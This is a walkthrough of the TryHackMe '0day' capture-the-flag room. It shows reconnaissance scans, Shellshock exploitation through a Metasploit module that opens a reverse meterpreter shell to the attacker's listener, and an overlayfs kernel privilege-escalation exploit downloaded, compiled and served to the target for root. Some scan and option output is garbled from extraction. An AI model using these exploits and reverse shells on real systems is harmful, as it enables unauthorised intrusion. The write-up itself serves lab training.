

TryHackMe

0day

https://tryhackme.com/room/0day

Walkthrough

By

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1. NMAP Scan

```
Nmap scan report for 10.10.31.133
Host is up (0.025s latency).
Not shown: 998 closed ports
      STATE SERVICE VERSION
22/tcp open ssh
                     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
 ssh-hostkey:
    1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
    2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
    256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
    256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
                    Apache httpd 2.4.7 ((Ubuntu))
80/tcp open http
| http-server-header: Apache/2.4.7 (Ubuntu)
 http-title: 0day
Service Info: OS: Linux; CPE: cpe:/o:linux:linux kernel
```

Okay, as we can see, there are two ports open:

- 1. Port 22 running SSH
- 2. Port 80 running HTTP

Great, what can we do?

I know there are no known serious exploits for the OpenSSH version that is running so we might as well check port 80.



As we can see, it is a contact (???) page for our might lord and saviour, 0day. The second best person on the TryHackMe platform.

Not much to do on this page, really. Let's run a gobuster and see what pops up.

```
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
                      http://10.10.17.191/
    Url:
    Threads:
                      40
    Wordlist:
                      /home/kali/Desktop/Wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
    Status codes:
                      200,204,301,302,307,401,403
   User Agent:
                      gobuster/3.0.1
    Extensions:
                      txt,zip,php
    Timeout:
2020/10/20 08:58:31 Starting gobuster
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/cgi-bin (Status: 301)
/img (Status: 301)
/backup (Status: 301)
/uploads (Status: 301)
/secret (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
Progress: 9107 / 26585 (34.26%)
```

Some directories popped up. However, there was nothing of importance in /js, /css, /img.

/admin and **/uploads** are just a **blank page**. (we can still gobust them though)

/backup

We've found a private key. It's encrypted... You can decrypt it but it's a rabbit whole (I think) so it's not worth the time.

/secret

This page only shows up this .png.

Nothing to do here.



/robots.txt

You really thought it'd be this easy?

Looks like Oday thought we would get here, haha. Nothing to do here either.

After a while of brute forcing directories and no results coming in, I thought to throw in a Nikto scan for good measure.

```
Nikto v2.1.6

Target IP: 10.10.31.133
Target Hostname: 10.10.31.133
Target Hostname: 10.10.31.133
Target Port: 80
Start Time: 2020-10-20 05:39:35 (GMT-4)

**Server: Apache/2.4.7 (Ubuntu)
**The anti-clickjacking X.Frame-Options header is not present.
**The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

**The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
**Server may leak inodes via ETags, header found with file /, inode: bdl, size: 5ae57bb9a1192, mtime: gzip
**Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
**Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
**Uncommon header '93e478-cue-2014-6271' found, with contents: true
**OSVOB-3092: /admin'. This might be interesting...
**OSVOB-3092: /admin'. This might be interesting...
**OSVOB-30992: /backupy: This might be interesting...
**OSVOB-30992: /css/: Directory indexing found.
**OSVOB-30992: /img/: Directory indexing found.
**OSVOB-3
```

Nikto discovered a weird header: '93e4r0-cve-2014-6271' AND 'test.cgi' in the /cgi-bin directory. That's a hint and a half if you ask me, mate.

Researching on this CVE, I found a family of exploits named 'Shellshock' (and that there are some Metasploit modules for it). Searching for 'shellshock' in Metasploit gave me this:

We are interested in number 5 since its name implies that might be what we're looking for since it matches what file we have on our hands: /cgi-bin/test.cgi

Filling in the options gives us this:

```
msf5 exploit(
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
      Name

        CMD_MAX_LENGTH
        2048

        CVE
        CVE-2014-6271

        HEADER
        User-Agent

        METHOD
        GET

                                                                                              yes
yes
yes
yes
no
                                                                                                                      CMD max line length
CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HTTP header to use
HTTP method to use
                                                                                                                     HTTP method to use
A proxy chain of format type:host:port[,type:host:port][...]
The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Target PATH for binaries used by the CmdStager
The target port (TCP)
The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
The local port to listen on.
Negotiate SSL/TLS for outgoing connections
Path to a custom SSL certificate (default is randomly generated)
Path to CGI script
HTTP read response timeout (seconds)
The URI to use for this exploit (default is random)
HTTP server virtual host
      Proxies
RHOSTS
RPATH
RPORT
SRVHOST
                                              10.10.17.191
/bin
80
0.0.0.0
                                              8080
false
        SRVPORT
       SSL
SSLCert
TARGETURI
TIMEOUT
       URIPATH
Payload options (linux/x86/meterpreter/reverse_tcp):
                                                                                           The listen address (an interface may be specified) The listen port
      LHOST
LPORT 4444
      Id Name
      0 Linux x86
                                                                                                    ash_env_exec) >
msf5 exploit(
```

Type run and let Metasploit do its thing:

```
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 10.11.6.36:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (980808 bytes) to 10.10.17.191
[*] Meterpreter session 1 opened (10.11.6.36:4444 → 10.10.17.191:51804) at 2020-10-20 09:31:33 -0400

meterpreter >
[0] 0:openvpn- 1:ruby*
```

Great, we can now drop into a shell and move about.

```
meterpreter > shell
Process 1108 created.
Channel 2 created.
cat user.txt
[0] 0:openvpn- 1:ruby*
```

Great, we have the user flag. Now onto root...

The root hint for this box says:

"This is a very old operating system you've got here, isn't it?.."

So, I guess we can use a kernel exploit for it.

```
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[0] 0:openvpn- 1:ruby*
```

We have to look for an exploit that fits the 3.13.0-32-generic kernel. Which I have found.

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

There is a Metasploit module for this exploit but I have not been able to make that work so I'll just do it manually by downloading the exploit itself.

We compile the .c file. We then transfer the compiled executable file over to our victim host through a python webserver and run it. We instantly get root.

Download the exploit.

```
-2020-10-20 09:38:41— https://www.exploit-db.com/raw/37292
-2020-10-20 09:38:41— https://www.exploit-db.com/raw/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292'
 2020-10-20 09:38:42 (58.6 MB/s) - '37292' saved [5119/5119]
total 32
drwxr-xr-x 2 kali kali 4096 Oct 20 09:38 .
drwxr-xr-x 6 kali kali 4096 Oct 20 04:31 ..
-rw-r--r- 1 kali kali 5119 Oct 20 09:38 37292
-rw-r-r- 1 kali kali 5119 Oct 20 09:38 17292
-rw-r- 1 kali kali 266 Oct 20 04:51 hash
-rw-- 1 kali kali 1769 Oct 20 05:31 id_rsa
-rw-r--r- 1 kali kali 5139 Oct 20 08:35 memos.txt
Malimumly:~/Desktop/Memos/Oday$ mv 37292 privesc.c
                                                                                                      /0day$ mv
/0day$ □
```

2. Compile it.

```
$ gcc privesc.c -o privesc
privesc.c: In function 'main':
privesc.c:106:12: warning: implicit declaration of function 'unshare' [-Wimplicit-function-declaration]

106 | if(unshare(CLONE_NEWUSER) ≠ 0)
privesc.c:111:17: warning: implicit declaration of function 'clone'; did you mean 'close'? [-Wimplicit-function-declaration]
                             clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
privesc.c:117:13: warning: implicit declaration of function 'waitpid' [-Wimplicit-function-declaration]

117 | waitpid(pid, &status, 0);
privesc.c:127:5: warning: implicit declaration of function 'wait' [-Wimplicit-function-declaration]
              wait(NULL);
kalimkali:~/Desktop/Memos/Oday$ ls
hash id_rsa memos.txt privesc
kalimkali:~/Desktop/Memos/Oday$
```

3. Move the executable to the victim's host.

#Run your python webserver.

```
:~/Desktop/Memos/0day$ ls
      id_rsa memos.txt privesc privesc.c
hash
        :~/Desktop/Memos/0day$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
[0] 0:openvpn 1:ruby- 2:bash*
```

- 4. Make the file executable: chmod +x <file_name>
- 5. Run the executable: ./<file name>
- 6. Get r00t.

```
./privesc

spawning threads

mount #1

mount #2

child threads done

/etc/ld.so.preload created

creating shared library

sh: 0: can't access tty; job control turned off

# id

uid=0(root) gid=0(root) groups=0(root),33(www-data)

# [0] 0:openvpn 1:ruby* 2:python3-
```

Great, we have root access. Let's get the flag.